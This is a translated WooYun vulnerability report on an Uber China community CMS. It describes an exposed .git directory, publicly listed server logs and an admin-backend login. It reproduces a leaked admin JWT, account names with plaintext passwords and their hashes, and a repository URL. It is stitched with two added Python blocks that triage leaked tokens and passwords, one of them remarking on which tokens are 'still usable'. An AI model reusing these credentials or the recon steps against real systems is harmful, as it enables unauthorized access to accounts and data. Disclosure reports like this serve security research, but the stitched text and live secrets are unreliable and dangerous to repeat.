WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-04-21: Details sent to the vendor, awaiting vendor handling
2016-04-22: Vendor confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and relevant domain experts
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public
Uber Community has multiple vulnerabilities: the admin backend can be entered, arbitrary SQL can be executed, and about 80,000 members are affected

dig www.uber.com.cn: it resolves to the same IP as the Uber main site.

#0 Impact description
dig ubernihao.com
dig uber.com.cn
The records show that the two are deployed inside the same network.

#1 An exposed .git directory leaks the whole site's source code
Once /.git/ is served as static content, the index and object store are fetchable along with config, so the complete working tree can be rebuilt, not just the file shown below.
python wyspider.py http://cms.ubernihao.com
--------------------------------------------------
* scan http://cms.ubernihao.com start
--------------------------------------------------
[200] http://cms.ubernihao.com => http://cms.ubernihao.com/
[200] http://cms.ubernihao.com/login.html => http://cms.ubernihao.com/login.html
[200] http://cms.ubernihao.com/.git/config => http://cms.ubernihao.com/.git/config
--------------------------------------------------
* scan complete...
--------------------------------------------------
{
  "dirs": {
    "http://cms.ubernihao.com": [
      "http://cms.ubernihao.com/"
    ]
  },
  "files": {
    "http://cms.ubernihao.com": {
      "/.git/": [
        "http://cms.ubernihao.com/.git/config"
      ],
      "/": [
        "http://cms.ubernihao.com/login.html"
      ]
    }
  }
}
http://cms.ubernihao.com/.git/config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[remote "origin"]
    fetch = +refs/heads/*:refs/remotes/origin/*
    url = [email protected]:muzhibuluo/uber_cms_v2.git
[branch "master"]
    remote = origin
    merge = refs/heads/master
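Added example, not part of the report and not code from the site's authors: a minimal parser for git's config syntax plus the check a scanner needs to tell a real exposed /.git/config from a catch-all "200 OK" page. The sample config below is constructed in the same layout as the one above; its remote host and repository path are hypothetical.

```python
import re

# Constructed sample with the same layout as the leaked .git/config above.
# The remote host and repository path are hypothetical, not the report's.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
[remote "origin"]
\tfetch = +refs/heads/*:refs/remotes/origin/*
\turl = git@git.example.test:example-org/cms_v2.git
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""

# '[section]' or '[section "subsection"]'
SECTION_RE = re.compile(r'^\[(\w+)(?:\s+"([^"]*)")?\]$')


def parse_git_config(text: str) -> dict:
    """Parse git config text into {'section.subsection.key': value}, the same
    dotted form `git config --list` prints. Comments (# or ;) are dropped."""
    out, prefix = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            prefix = m.group(1) if m.group(2) is None else f"{m.group(1)}.{m.group(2)}"
            continue
        if "=" in line and prefix:
            key, _, value = line.partition("=")
            out[f"{prefix}.{key.strip()}"] = value.strip()
    return out


def looks_like_git_config(status: int, body: str) -> bool:
    """True only for a response that is a genuine git config: HTTP 200 and a
    parseable body carrying core.repositoryformatversion. Soft-404 pages that
    answer 200 to every path fail this test."""
    if status != 200:
        return False
    return "core.repositoryformatversion" in parse_git_config(body)


def remotes(cfg: dict) -> dict:
    """Map remote name -> URL. This is the first thing an attacker reads from
    an exposed config: it names the hosting account and repository."""
    return {k.split(".")[1]: v for k, v in cfg.items()
            if k.startswith("remote.") and k.endswith(".url")}


if __name__ == "__main__":
    cfg = parse_git_config(SAMPLE_CONFIG)
    print("exposed:", looks_like_git_config(200, SAMPLE_CONFIG))
    print("remotes:", remotes(cfg))
```

Only a 200 with a parseable body counts; a scanner that reports on status code alone will flag every server that serves a custom page for unknown paths. Once the config is confirmed real, the rest of /.git/ (index, refs, objects) is what actually yields the source tree.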
#2 The system debug log, error log and access log are remotely accessible
http://code.ubernihao.com/logs/
Index of /logs/
../
access.log             21-Apr-2016 06:32   357M
debug.log              21-Apr-2016 06:32   440M
debug.log-2016-04-13   13-Apr-2016 09:42    71K
debug.log-2016-04-14   14-Apr-2016 17:34   174K
debug.log-2016-04-15   16-Apr-2016 15:59   293M
debug.log-2016-04-16   17-Apr-2016 15:59   260M
debug.log-2016-04-17   18-Apr-2016 08:16   152M
debug.log-2016-04-18   19-Apr-2016 15:59   129M
debug.log-2016-04-19   20-Apr-2016 09:28    85M
debug.log-2016-04-20   21-Apr-2016 04:01    92M
error.log              21-Apr-2016 06:32   329M
info.log               21-Apr-2016 06:32   685M
#3 The logs leak large amounts of sensitive information: users' access tokens and login passwords
The authorization value is passed in the query string, so it lands in the access log by design. It is an HS256 JWT; its payload decodes to {"id":1,"type":"local","iat":1460535670,"exp":1462609270}, a token for admin user 1 valid for 24 days from issue.
[2016-04-13 16:21:26.008] [INFO] http - 116.23.126.182 - - "PUT /adminUsers/1?authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidHlwZSI6ImxvY2FsIiwiaWF0IjoxNDYwNTM1NjcwLCJleHAiOjE0NjI2MDkyNzB9.dscvgrWIzwL-Kl_jeElfAes93RLGRC3gG4nxa2BwTzU HTTP/1.0" 200 196 "http://cms.ubernihao.com/index.html" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36"
[2016-04-13 16:21:26.046] [DEBUG] mysqlDb - query sql : select id,email,nickname,cities,level,create_time as createTime from admin_user where level>=:level { level: '0' }
[2016-04-13 16:21:26.047] [DEBUG] mysqlDb - formatedSql: select id,email,nickname,cities,level,create_time as createTime from admin_user where level>='0'
[2016-04-13 16:21:26.049] [DEBUG] mysqlDb - operator back rows length : 1
[2016-04-13 16:21:26.050] [INFO] http - 116.23.126.182 - - "GET /adminUsers/manage?cities=*&level=0 HTTP/1.0" 304 - "http://cms.ubernihao.com/index.html" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36"
[2016-04-13 16:21:37.959] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=muzhi&passwd=uber undefined undefined undefined undefined
Passwords transmitted in plaintext and captured from the log
The login request carries the password in clear in the query string, and the DEBUG line that follows echoes the stored form: a 32-hex-character digest, consistent with an unsalted hash (the report does not state the algorithm).
cat debug.log-2016-04-16 | grep passwd
[2016-04-17 00:48:14.330] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=muzhi&passwd=ubernihao undefined undefined undefined undefined
[2016-04-17 00:48:14.334] [DEBUG] mysqlDb - query sql : select id,email,nickname,passwd,cities,level,status,create_time,create_by,update_time,update_by from admin_user where 1=1 and email='muzhi' and passwd='f1a89ad1f8388af2fe5b99ee07d2f468' order by id desc
[2016-04-17 00:48:14.336] [INFO] http - ::ffff:127.0.0.1 - - "GET /adminUsers?email=muzhi&passwd=ubernihao HTTP/1.1" 200 270 "" "undefined"
[2016-04-17 14:31:32.614] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=gz01&passwd=gz0101 undefined undefined undefined undefined
[2016-04-17 14:31:32.618] [DEBUG] mysqlDb - query sql : select id,email,nickname,passwd,cities,level,status,create_time,create_by,update_time,update_by from admin_user where 1=1 and email='gz01' and passwd='e6144bda3a2f257ac9b59c9007bd9dbb' order by id desc
[2016-04-17 14:31:32.620] [INFO] http - ::ffff:127.0.0.1 - - "GET /adminUsers?email=gz01&passwd=gz0101 HTTP/1.1" 200 260 "" "undefined"
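Added example, not part of the report and not code from the site's authors, covering both #3 and the plaintext-password grep above: detection logic that scans log lines of this shape for tokens and passwords in query strings, decodes any JWT it finds (without verifying it), pulls the password digest out of the SQL debug line, and tests whether the plaintext and digest pair up as an unsalted fast hash. The sample log is constructed: the JWT is the one visible in the report, while the IP, account name, password and digest are made up (the pair is md5("password")).

```python
import base64
import hashlib
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample modelled on the leaked debug.log lines quoted above.
# The JWT is the one from the report; IP, account, password and digest are
# made up, and the digest is md5("password").
SAMPLE_LOG = """\
[2016-04-13 16:21:26.008] [INFO] http - 198.51.100.7 - - "PUT /adminUsers/1?authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidHlwZSI6ImxvY2FsIiwiaWF0IjoxNDYwNTM1NjcwLCJleHAiOjE0NjI2MDkyNzB9.dscvgrWIzwL-Kl_jeElfAes93RLGRC3gG4nxa2BwTzU HTTP/1.0" 200 196 "http://cms.example.test/index.html" "Mozilla/5.0"
[2016-04-17 00:48:14.330] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=alice&passwd=password undefined undefined undefined undefined
[2016-04-17 00:48:14.334] [DEBUG] mysqlDb - query sql : select id,email,passwd from admin_user where 1=1 and email='alice' and passwd='5f4dcc3b5aa765d61d8327deb882cf99' order by id desc
[2016-04-17 00:48:14.336] [INFO] http - ::ffff:127.0.0.1 - - "GET /adminUsers?email=alice&passwd=password HTTP/1.1" 200 270 "" "undefined"
"""

JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")
# Request path as it appears in an access line ("GET /x?y HTTP/1.1") and in
# the app's NoUnauthorizationHeader error line ("... /x?y undefined").
PATH_RE = re.compile(r'(?:"(?:GET|PUT|POST|DELETE) |NoUnauthorizationHeader )(/\S*\?\S+)')
SQL_HASH_RE = re.compile(r"email='([^']*)' and passwd='([0-9a-f]{32,64})'")
SECRET_PARAMS = ("passwd", "password", "authorization", "token", "access_token")


def b64url_decode(part: str) -> bytes:
    """JWT segments drop base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_jwt_unverified(token: str) -> dict:
    """Decode header and payload only. The signature is NOT checked: this is
    triage of a token that has already leaked, not authentication."""
    header, payload, _sig = token.split(".")
    return {"header": json.loads(b64url_decode(header)),
            "payload": json.loads(b64url_decode(payload))}


def guess_unsalted_hash(plaintext: str, digest: str):
    """Return the algorithm whose plain hexdigest of `plaintext` equals
    `digest`, or None. A hit means the DB stores an unsalted fast hash."""
    for name in ("md5", "sha1", "sha256"):
        if hashlib.new(name, plaintext.encode()).hexdigest() == digest.lower():
            return name
    return None


def find_leaks(log_text: str) -> list:
    """Scan log lines for credentials: tokens and passwords in query strings,
    and password digests echoed by the SQL debug logger."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for tok in JWT_RE.findall(line):
            findings.append({"line": lineno, "kind": "jwt", "value": tok,
                             "claims": decode_jwt_unverified(tok)["payload"]})
        m = PATH_RE.search(line)
        if m:
            qs = parse_qs(urlsplit(m.group(1)).query)
            for key in SECRET_PARAMS:
                for val in qs.get(key, []):
                    if not JWT_RE.fullmatch(val):  # JWTs were recorded above
                        findings.append({"line": lineno, "kind": "query_secret",
                                         "param": key, "value": val,
                                         "email": qs.get("email", [None])[0]})
        m = SQL_HASH_RE.search(line)
        if m:
            findings.append({"line": lineno, "kind": "sql_hash",
                             "email": m.group(1), "digest": m.group(2)})
    return findings


def correlate(findings: list) -> list:
    """Pair the plaintext password from a request line with the digest of the
    same account from a SQL line: (email, plaintext, digest, algorithm|None)."""
    plain = {f["email"]: f["value"] for f in findings
             if f["kind"] == "query_secret" and f["param"] == "passwd" and f["email"]}
    return [(f["email"], plain[f["email"]], f["digest"],
             guess_unsalted_hash(plain[f["email"]], f["digest"]))
            for f in findings if f["kind"] == "sql_hash" and f["email"] in plain]


if __name__ == "__main__":
    found = find_leaks(SAMPLE_LOG)
    for f in found:
        print(f)
    for email, pw, digest, alg in correlate(found):
        print(f"{email}: plaintext={pw!r} digest={digest} unsalted={alg}")
```

Run against the real files, the jwt findings give the exp claim of every leaked token, so you can tell which ones are still usable, and correlate shows whether the stored digests are a fast unsalted hash that the plaintext in the same log makes moot anyway. The report's own digest values are not tested here because the algorithm is not stated on the page.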
#4 Log in to the backend with the account details found in the debug log
Raise security awareness, that's all.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-04-22 04:54
Thank you for the information; we are handling it as quickly as possible.
None yet